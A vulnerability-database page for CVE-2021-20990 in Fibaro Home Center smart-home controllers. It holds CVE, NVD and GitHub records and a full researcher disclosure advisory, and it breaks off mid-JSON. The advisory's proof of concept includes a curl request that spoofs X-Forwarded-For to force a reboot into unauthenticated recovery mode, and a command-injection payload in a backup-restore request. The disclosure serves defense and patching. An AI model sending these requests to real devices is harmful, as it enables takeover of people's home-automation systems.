Vulnerability-Lookup

CVE-2021-20990 (GCVE-0-2021-20990)

Vulnerability from cvelistv5 – Published: 2021-04-19 14:05 – Updated: 2024-09-16 16:42

Title

Fibaro Home Center Unauthenticated access to shutdown, reboot and reboot to recovery mode

Summary

In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-306 - Missing Authentication for Critical Function

Assigner

CERTVDE

References

URL

	Vendor	Product	Version
	Fibar Group S.A	Fibaro Home Center	Affected: Home Center 2 , ≤ 4.600 (custom) Affected: Home Center Lite , ≤ 4.600 (custom)

GSD-2021-20990

Vulnerability from gsd - Updated: 2023-12-13 01:23

Details

Aliases

CVE-2021-20990

Aliases

CVE-2021-20990

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2021-20990",
    "description": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode.",
    "id": "GSD-2021-20990",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2021-20990"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2021-20990"
      ],
      "details": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode.",
      "id": "GSD-2021-20990",
      "modified": "2023-12-13T01:23:11.938563Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "info@cert.vde.com",
        "DATE_PUBLIC": "2021-04-15T10:00:00.000Z",
        "ID": "CVE-2021-20990",
        "STATE": "PUBLIC",
        "TITLE": "Fibaro Home Center Unauthenticated access to shutdown, reboot and reboot to recovery mode"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Fibaro Home Center",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c=",
                          "version_name": "Home Center 2",
                          "version_value": "4.600"
                        },
                        {
                          "version_affected": "\u003c=",
                          "version_name": "Home Center Lite",
                          "version_value": "4.600"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Fibar Group S.A"
            }
          ]
        }
      },
      "credit": [
        {
          "lang": "eng",
          "value": "Marton Illes IoT Inspector Research Lab https://www.iot-inspector.com"
        }
      ],
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode."
          }
        ]
      },
      "generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "CWE-306 Missing Authentication for Critical Function"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/",
            "refsource": "CONFIRM",
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "name": "20210419 [CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, CVE-2021-20992] Multiple vulnerabilities in Fibaro Home Center",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2021/Apr/27"
          },
          {
            "name": "http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html"
          }
        ]
      },
      "source": {
        "discovery": "EXTERNAL"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:fibaro:home_center_2_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.600",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:fibaro:home_center_2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:fibaro:home_center_lite_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.600",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:fibaro:home_center_lite:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "info@cert.vde.com",
          "ID": "CVE-2021-20990"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-306"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
            },
            {
              "name": "20210419 [CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, CVE-2021-20992] Multiple vulnerabilities in Fibaro Home Center",
              "refsource": "FULLDISC",
              "tags": [
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "http://seclists.org/fulldisclosure/2021/Apr/27"
            },
            {
              "name": "http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2022-10-29T02:48Z",
      "publishedDate": "2021-04-19T14:15Z"
    }
  }
}

FKIE_CVE-2021-20990

Vulnerability from fkie_nvd - Published: 2021-04-19 14:15 - Updated: 2024-11-21 05:47

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
info@cert.vde.com	http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html	Exploit, Third Party Advisory, VDB Entry
info@cert.vde.com	http://seclists.org/fulldisclosure/2021/Apr/27	Mailing List, Third Party Advisory
info@cert.vde.com	https://www.iot-inspector.com/blog/advisory-fibaro-home-center/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2021/Apr/27	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.iot-inspector.com/blog/advisory-fibaro-home-center/	Exploit, Third Party Advisory

Impacted products

Vendor	Product	Version
fibaro	home_center_2_firmware	*
fibaro	home_center_2	-
fibaro	home_center_lite_firmware	*
fibaro	home_center_lite	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:fibaro:home_center_2_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "867FAF63-0352-4AC8-AB9D-1FDEC2E942D4",
              "versionEndIncluding": "4.600",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:fibaro:home_center_2:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8021D17B-DD82-46D0-AE92-372649467F1F",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:fibaro:home_center_lite_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A06A908C-D871-46DA-AC42-63FF1518A558",
              "versionEndIncluding": "4.600",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:fibaro:home_center_lite:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A19AFCC-B670-450C-8B64-7770C86B4692",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode."
    },
    {
      "lang": "es",
      "value": "En los dispositivos Fibaro Home Center versi\u00f3n 2 y Lite con versiones de firmware 4.600 y anteriores, un servicio de administraci\u00f3n interno es accesible en el puerto 8000 y algunos endpoints de la API pueden ser accedidos sin autenticaci\u00f3n para desencadenar un apagado, un reinicio o un reinicio en modo de recuperaci\u00f3n"
    }
  ],
  "id": "CVE-2021-20990",
  "lastModified": "2024-11-21T05:47:20.700",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "info@cert.vde.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Secondary"
      }
    ]
  },
  "published": "2021-04-19T14:15:11.710",
  "references": [
    {
      "source": "info@cert.vde.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html"
    },
    {
      "source": "info@cert.vde.com",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Apr/27"
    },
    {
      "source": "info@cert.vde.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Apr/27"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
    }
  ],
  "sourceIdentifier": "info@cert.vde.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "info@cert.vde.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Secondary"
    }
  ]
}

GHSA-V9VJ-VPG8-VQMJ

Vulnerability from github – Published: 2022-05-24 17:47 – Updated: 2022-08-06 00:00

Details

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2021-20990"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-19T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode.",
  "id": "GHSA-v9vj-vpg8-vqmj",
  "modified": "2022-08-06T00:00:41Z",
  "published": "2022-05-24T17:47:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20990"
    },
    {
      "type": "WEB",
      "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2021/Apr/27"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

VAR-202104-0468

Vulnerability from variot - Updated: 2024-11-23 22:05

~~~

             title: Multiple vulnerabilities 

    vendor/product: Fibaro Home Center Light / Fibaro Home Center 2

                    https://www.fibaro.com/

vulnerable version: 4.600 and older

     fixed version: 4.610

        CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, 

                    CVE-2021-20992

            impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

                    9.8 (critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

                    7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

                    8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

          reported: 2020-11-18

       publication: 2021-04-08

                by: Marton Illes, IoT Inspector Research Lab

                    https://www.iot-inspector.com/




Vendor description:

-------------------

"FIBARO is a global brand based on the Internet of Things technology. It 

provides solutions for building and home automation. FIBARO's headquarters

and factory are located in Wysogotowo, 3 miles away from Poznan. The company

employs app. 250 employees."



https://www.fibaro.com/en/about-us/





Vulnerability overview/description:

-----------------------------------

1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)

Home Center devices initiate SSH connections to the Fibaro cloud to provide 

remote access and remote support capabilities. This connection can be 

intercepted using a man-in-the-middle attack and a device initiated remote 

port-forward channel can be used to connect to the web management interface. 


IoT Inspector identified a disabled SSH host key check, which enables 

man-in-the-middle attacks. 



By initiating connections to the Fibaro cloud an attacker can eavesdrop on 

communication between the user and the device. As communication inside the 

SSH port-forward is not encrypted (see #4 on management interface), user 

sessions, tokens and passwords can be hijacked. In recovery mode, an attacker can 

upload firmware without authentication. (Potentially an earlier version with


known remote command execution vulnerability, see #3)



3) Authenticated remote command execution (versions before 4.550) 

(CVE-2021-20991)

An authenticated user can run commands as root user using a command
injection 

vulnerability. 

Similar problems were also discovered by Pavel Cheremushkin from Kaspersky 

ICS Cert: https://securelist.com/fibaro-smart-home/91416/



4) Unencrypted management interface (CVE-2021-20992)

Home Center devices provide a web based management interface over
unencrypted 

HTTP protocol. Communication between the user and the device can be 

eavesdropped to hijack sessions, tokens, and passwords. The management 

interface is only available over HTTP on the local network. The vendor 

recommends using the cloud-based management interface, which is accessible
over 

HTTPS and requests are forwarded via an encrypted SSH connection between the


Fibaro cloud and the device. 





Proof of concept:

-----------------

1) Cloud SSH Connection Man-in-the-Middle Attack



Home Center devices initiate a SSH connection to the Fibaro cloud





./etc/init.d/fibaro/RemoteAccess



<snip>

DAEMON=/usr/bin/ssh



.... 



case "$1" in

  start)



                ..... 



    # get IP

    local
GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria
l}&HW_Key=${HW_Key}"

    local IP_Response; IP_Response=$(curl -f -s -S --retry 3
--connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
!"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')



    # get PORT

    local
GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S
erial}&HW_Key=${HW_Key}"

    local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3
--connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
!"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')



                .... 



    start-stop-daemon --start --background --pidfile "${PIDFILE}"
--make-pidfile --startas /usr/bin/screen \

    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i
/etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80
remote2@"${IP_Response}"

</snip>



The device uses dropbear ssh to initiate the connection; option -y disables
any 

host-key checks, voiding much of the otherwise added transport-layer
security 

by SSH: "Always accept hostkeys if they are unknown."



The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: 

lb-1.eu.ra.fibaro.com



An attacker can use DNS spoofing or other means to intercept the connection. 
By 

using any hostkey, the attacker can successfully authenticate the SSH 

connection. Once the connection is authenticated, the client initiates a
remote 

port-forward:

-R "${PORT_Response}":localhost:80



This enables the attacker to access port 80 (management interface) of the 

device. 



A similar problem exists for remote support connections:



./opt/fibaro/scripts/remote-support.lua

<snip>

function handleResponse(response)

  responseJson = json.decode(response.data)

  print(json.encode(responseJson))



  local autoSSHCommand = 'ssh -y -K 30 -i
/etc/dropbear/dropbear_rsa_host_key -R '  .. responseJson.private_ip..  ':'
.. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip

  os.execute(autoSSHCommand)

end



function getSupportData()

  remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint='
.. serialNumber .. '&HW_Key=' .. HWKey

  print(remoteUrl)



  http = net.HTTPClient({timeout = 5000})



  http:request(remoteUrl, {

    options = {

      method = 'GET'

    },

    success = function(response)

      handleResponse(response)

    end,

    error = function(error)

      print(error)

    end

  })

end



getSupportData()

</snip>



Here, the remote support endpoint returns the following data:

{"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY
.ZZZ"}



The same dropbear ssh client is used with option -y. In this case, port 22 

(ssh) is made accessible through the port-forward. However, the device only 

allows public key authentication with a hard-coded SSH key. No further
testing 

has been done on compromising the support SSH connection. 





2) Unauthenticated access to shutdown, reboot and reboot to recovery mode



The device is running a nginx server, which forwards some requests to a 

lighttpd server (8000) for further processing:

<snip>

                                proxy_set_header X-Forwarded-For
$proxy_add_x_forwarded_for;



        location ~* \.php$ {

            proxy_pass   http://127.0.0.1:8000;

        }



        location ~* \.php\?.* {

            proxy_pass   http://127.0.0.1:8000;

        }

</snip>



The lighttpd server is not only accessible locally, but also via the local 

network. 



Authentication and authorization is implemented in PHP and there is a
special 

check for connections originating from within the host. However, when
checking 

the remote IP address, the header X-Forwarded-For is also considered:



./var/www/authorize.php

<snip>

function isLocalRequest()

{

    $ipAddress = "";

    if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) 

        $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];

    else

        $ipAddress = $_SERVER['REMOTE_ADDR'];



    $whitelist = array( '127.0.0.1', '::1' );

    if(in_array($ipAddress, $whitelist))

        return true;



    return false;

}

</snip>



As the lighttpd service available via the network, an attacked can inject
the 

required header X-Forwarded-For as well. 



The check isLocalRequest is used to "secure" multiple endpoints:



./var/www/services/system/shutdown.php

<snip>

<?php

    require_once("../../authorize.php");



    if (!isLocalRequest() && !isAuthorized())

    {

       sendUnauthorized();

    }

    else

    {

        exec("systemShutdown");

    }

?>

</snip>



./var/www/services/system/reboot.php

<snip>



function authorize() 

{

    return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,
role::INSTALLER));

}



function handlePOST($text)

{

    if (!isLocalRequest() && !authorize())

    {

       sendUnauthorized();

       return;

    }



    $params = tryDecodeJson($text);

    if(!is_null($params) && isset($params->recovery) && $params->recovery
=== true)

        exec("rebootToRecovery");

    else

        exec("systemReboot");

}



$requestBody = file_get_contents('php://input');

$requestMethod = $_SERVER['REQUEST_METHOD'];



if ($requestMethod == "POST") 

    handlePOST($requestBody);

else 

    setStatusMethodNotAllowed();



</snip>



An attacker can issue the the following HTTP request to reboot the device
into 

recovery mode:

curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d
'{"recovery":true}'  http://DEVICE:8000/services/system/reboot.php



In recovery mode, firmware images can be updated without authentication. 





3) Authenticated remote command execution (versions before 4.550)



Backup & restore operations could be triggered though HTTP endpoints:



./var/www/services/system/backups.php

<snip>

function restoreBackup($params)

{

    if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)

    {

        setStatusTooManyRequests();

        return;

    }



    $type = $params->type;

    $id = $params->id;

    $version = $params->version;



    if (is_null($id) || !is_numeric($id) || $id < 1 ) 

    {

        setStatusBadRequest();

        return;

    }



    $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");



    if ($type == "local" && $hcVersion == "HC2" || $type == "remote") 

    {

        $version ?

                exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
$id . ' ' . $version) :

                exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
$id);

    }

    else 

    {

        setStatusBadRequest();

        return;

    }



    setStatusAccepted();

}

</snip>



The parameter $version is not sanitized or escaped, which allows an attacker
to 

inject shell commands into the exec() call:



cat > /tmp/exploit <<- EOM

{"action": "restore", "params": {"type": "remote", "id": 1, "version": "1;
INJECTED COMMAND"}}

EOM



curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type:
application/json' -d@/tmp/exploit  http://DEVICE/services/system/backups.php




Version 4.550 and later have proper escaping:

<snip>

    $version = escapeshellarg($params->version);

</snip>





4) Unencrypted management interface



NMMAP shows a few open ports on the box:

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

8000/tcp open  http-alt



Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. 





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable / tested versions:

Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version

at the time of the discovery

Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530

Solution:

Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1,

2 and 3.

Vulnerability 4 is not fixed as the vendor assumes that the local network is

trusted and the device only provides wired network access. Furthermore, the

vendor recommends using the cloud-based management interface, which is

accessible over HTTPS and requests are forwarded via an encrypted SSH

connection between the Fibaro cloud and the device.

Advisory URL:

https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

Vendor contact timeline:

2020-11-18: Contacting Fibaro through support@fibaro.com,

        support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com

2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn

2020-11-24: Adivsory sent to Fibaro by email

2020-12-01: Fibaro confirmed the receipt of the advisory

2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes

2021-03-16: Fibaro beta release (4.601) with the fixes

2021-03-24: Fibaro applies for CVE numbers

2021-03-31: Fibaro GA release (4.610) with the fix

2021-04-08: IoT Inspector Research Lab publishes advisory

~~~



The IoT Inspector Research Lab is an integrated part of IoT Inspector. 



IoT Inspector is a platform for automated security analysis and compliance 

checks of IoT firmware. Our mission is to secure the Internet of Things. In 

order to discover vulnerabilities and vulnerability patterns within IoT
devices

and to further enhance automated identification that allows for scalable 

detection within IoT Inspector, we conduct excessive security research in
the

area of IoT. 



Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT 

firmware, we aim to responsibly disclose relevant information to the vendor

of the affected IoT device as well as the general public in a way that 

minimizes potential harm and encourages further security analyses of IoT 

systems. 



You can find our responsible disclosure policy here:

https://www.iot-inspector.com/responsible-disclosure-policy/

~~~

Interested in using IoT Inspector for your research or product?

Mail: research at iot-inspector dot com

Web: https://www.iot-inspector.com

Blog: https://www.iot-inspector.com/blog/

Twitter: https://twitter.com/iotinspector

EOF Marton Illes / @2021

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
